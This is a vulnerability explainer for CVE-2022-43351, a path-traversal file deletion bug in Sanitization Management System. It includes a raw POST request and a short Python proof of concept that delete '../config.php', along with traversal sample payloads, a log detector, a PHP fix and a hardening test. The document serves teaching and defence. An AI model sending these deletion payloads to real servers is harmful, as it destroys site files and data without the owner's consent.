In late 2022, a critical security flaw was discovered in the popular *Sanitization Management System v1.*. Tracked as CVE-2022-43351, this vulnerability allows any attacker to delete arbitrary files on the server due to insufficient input validation in a specific backend script. This article breaks down what that means, how the bug works, and even demonstrates code snippets to help you understand (and responsibly test) this vulnerability.

What is Sanitization Management System?

This open-source web application helps organizations manage cleaning and sanitization schedules. Like many PHP-based web apps, it has scripts to upload and delete files, such as images of cleaning records or receipts.

The flaw is in this endpoint:

/classes/Master.php?f=delete_img

This endpoint is supposed to delete images that users have previously uploaded. However, it doesn't properly check the filename that's passed in. Instead, it deletes whatever file path it is given, including sensitive files outside of the intended upload directory.

Let's look at a simplified version of the relevant code (as reconstructed from public sources):

// Located in /classes/Master.php

if ($_GET['f'] == 'delete_img') {
    $file = $_POST['img_path'];
    if (file_exists($file)) {
        unlink($file); // Unconditionally deletes the file!
        echo json_encode(['status' => 'success']);
    } else {
        echo json_encode(['status' => 'error', 'msg' => 'File not found']);
    }
    exit;
}

Send a POST request:

POST /classes/Master.php?f=delete_img HTTP/1.1
Host: target-site.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 22

img_path=../config.php

Proof of Concept Script (Python)

import requests

# The vulnerable endpoint from the advisory (target-site.com is a placeholder host)
url = "http://target-site.com/classes/Master.php?f=delete_img"
# Relative path that escapes the uploads directory; the script never validates it
data = {"img_path": "../config.php"}

response = requests.post(url, data=data)
print(response.text)  # JSON status returned by the delete_img handler

Warning: Don’t use this on systems you don’t own or don’t have permission to test!

How is This Dangerous?

- Attackers can delete important files like .htaccess, index.php, or even application config files. This can cause site outages, data loss, or open up new security holes.

- Combined with file upload bugs, an attacker can plant and later delete malicious scripts to evade detection.
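Because the dangerous value travels in the POST body, an ordinary access log will not show it; a WAF or application audit log that records request bodies will. The following Python example is added here and is not part of the original article or the Sanitization Management System code. It runs a detection pass over a constructed log in a hypothetical one-line-per-request format (timestamp, client, method, URL, body), decodes nested URL encoding, and flags any delete_img request whose img_path contains traversal, an absolute path, or a null byte. The function names and the log format are my own.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample log (hypothetical format: time client method url body).
# Only the second, third and fourth lines should be flagged.
SAMPLE_LOG = """\
2022-11-07T15:15:00Z 203.0.113.5 POST /classes/Master.php?f=delete_img img_path=receipt_42.png
2022-11-07T15:15:07Z 203.0.113.5 POST /classes/Master.php?f=delete_img img_path=../config.php
2022-11-07T15:15:09Z 203.0.113.5 POST /classes/Master.php?f=delete_img img_path=..%252F..%252F.htaccess
2022-11-07T15:15:12Z 198.51.100.9 POST /classes/Master.php?f=delete_img img_path=/var/www/app/index.php
2022-11-07T15:16:00Z 198.51.100.9 GET /classes/Master.php?f=list_img -
"""

# A ".." path component delimited by a slash or backslash (or the string ends)
TRAVERSAL = re.compile(r"(^|[\\/])\.\.([\\/]|$)")


def fully_decode(value, rounds=3):
    """Undo up to `rounds` layers of URL encoding so that %2e%2e%2f and the
    double-encoded %252e%252e%252f are both seen as '../'."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify_img_path(value):
    """Return a reason string if this img_path should never reach unlink(), else None."""
    decoded = fully_decode(value)
    if "\x00" in decoded:
        return "null byte"
    if TRAVERSAL.search(decoded):
        return "directory traversal"
    if decoded.startswith(("/", "\\")) or re.match(r"^[A-Za-z]:[\\/]", decoded):
        return "absolute path"
    return None


def parse_line(line):
    """Split one constructed log line into its fields; '-' means an empty body."""
    ts, client, method, url, body = line.split(" ", 4)
    query = parse_qs(urlsplit(url).query)
    params = parse_qs(body) if body != "-" else {}
    return ts, client, method, query, params


def scan_log(text):
    """Return (timestamp, client, reason, decoded_value) for each suspicious
    POST to Master.php?f=delete_img found in the log text."""
    findings = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, client, method, query, params = parse_line(line)
        if method != "POST" or query.get("f", [""])[0] != "delete_img":
            continue
        for value in params.get("img_path", []):
            reason = classify_img_path(value)
            if reason:
                findings.append((ts, client, reason, fully_decode(value)))
    return findings


if __name__ == "__main__":
    for ts, client, reason, value in scan_log(SAMPLE_LOG):
        print(f"{ts} {client} {reason}: img_path={value!r}")
```

The decode loop matters: parse_qs already removes one layer of percent-encoding, so a single extra unquote would miss a doubly-encoded value, while a bounded loop catches it without looping forever on literal percent signs.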

1. Sanitize Input: Only allow deletion of files inside the *uploads* directory.

2. Whitelist Filenames: Only accept expected file names/types.

Example Fix

$uploads_dir = '/var/www/app/uploads/';
// basename() drops any directory part, so "../config.php" becomes "config.php";
// realpath() then resolves symlinks and returns false if the file does not exist.
$file = realpath($uploads_dir . basename($_POST['img_path']));

// Make sure the file is inside the allowed directory
if ($file !== false && strpos($file, $uploads_dir) === 0 && file_exists($file)) {
    unlink($file);
    echo json_encode(['status' => 'success']);
} else {
    echo json_encode(['status' => 'error', 'msg' => 'File not found']);
}
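To see the two checks side by side on a real filesystem, here is an added Python example; it is not code from the project or from the original article. It mirrors the vulnerable lookup (the supplied path used as-is with only an existence check) and the hardened lookup (basename, realpath, containment check), and runs both against the request from the article, a planted symlink, an absolute path and a legitimate upload, all created in a throwaway directory. The function names vulnerable_delete_target, resolve_delete_target and demo are my own.

```python
import os
import tempfile


def vulnerable_delete_target(base_dir, img_path):
    """Mirror of the page's vulnerable logic: the supplied path is joined
    unchanged and only checked for existence before deletion."""
    candidate = os.path.join(base_dir, img_path)
    return candidate if os.path.isfile(candidate) else None


def resolve_delete_target(uploads_dir, img_path):
    """Hardened version of the same lookup. Returns the absolute path that
    may be passed to os.remove(), or None when the request must be refused."""
    uploads_real = os.path.realpath(uploads_dir)
    # basename() throws away any directory component ("../config.php" -> "config.php")
    candidate = os.path.realpath(os.path.join(uploads_real, os.path.basename(img_path)))
    # realpath() has followed symlinks, so a link in uploads/ that points elsewhere
    # now resolves outside; commonpath() avoids the "/uploads" vs "/uploads2"
    # prefix mistake that a plain startswith() check would make.
    if os.path.commonpath([uploads_real, candidate]) != uploads_real:
        return None
    if not os.path.isfile(candidate):
        return None
    return candidate


def demo():
    """Build a constructed web root in a temp dir and run both checks against
    the article's request, a symlink escape, an absolute path and a real upload."""
    with tempfile.TemporaryDirectory() as root:
        uploads = os.path.join(root, "uploads")
        os.mkdir(uploads)
        config = os.path.join(root, "config.php")       # sensitive file outside uploads/
        receipt = os.path.join(uploads, "receipt.png")  # a normal uploaded image
        for path in (config, receipt):
            with open(path, "w") as fh:
                fh.write("placeholder")
        try:
            # a planted link inside uploads/ that points at the config file
            os.symlink(config, os.path.join(uploads, "link.png"))
        except OSError:
            pass  # platforms without symlink support simply skip this case

        return {
            # the vulnerable check resolves ../config.php to a deletable file
            "vulnerable_accepts_traversal": vulnerable_delete_target(uploads, "../config.php") is not None,
            # the hardened check refuses traversal, the symlink and an absolute path
            "safe_rejects_traversal": resolve_delete_target(uploads, "../config.php") is None,
            "safe_rejects_symlink": resolve_delete_target(uploads, "link.png") is None,
            "safe_rejects_absolute": resolve_delete_target(uploads, config) is None,
            # but still allows deleting a genuine upload
            "safe_allows_upload": resolve_delete_target(uploads, "receipt.png") == os.path.realpath(receipt),
        }


if __name__ == "__main__":
    for check, ok in demo().items():
        print(f"{check}: {'pass' if ok else 'FAIL'}")
```

The symlink case is why the containment check stays even though basename() already strips traversal: an attacker who can create a link inside the uploads directory (for example through a separate upload bug, as the article mentions) would otherwise get a file outside it deleted.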

References & Further Reading

- NVD entry for CVE-2022-43351
- Packet Storm Advisory
- Exploit-DB ID 51087

Conclusion

CVE-2022-43351 is a prime example of why input validation is crucial for web security. If you use Sanitization Management System v1., patch or fix this flaw as soon as you can. Arbitrary file deletion can have devastating impacts! If you're a developer, always check, validate, and sanitize all user-provided data before using it in file operations.

Timeline

Published on: 11/07/2022 15:15:00 UTC
Last modified on: 11/08/2022 04:19:00 UTC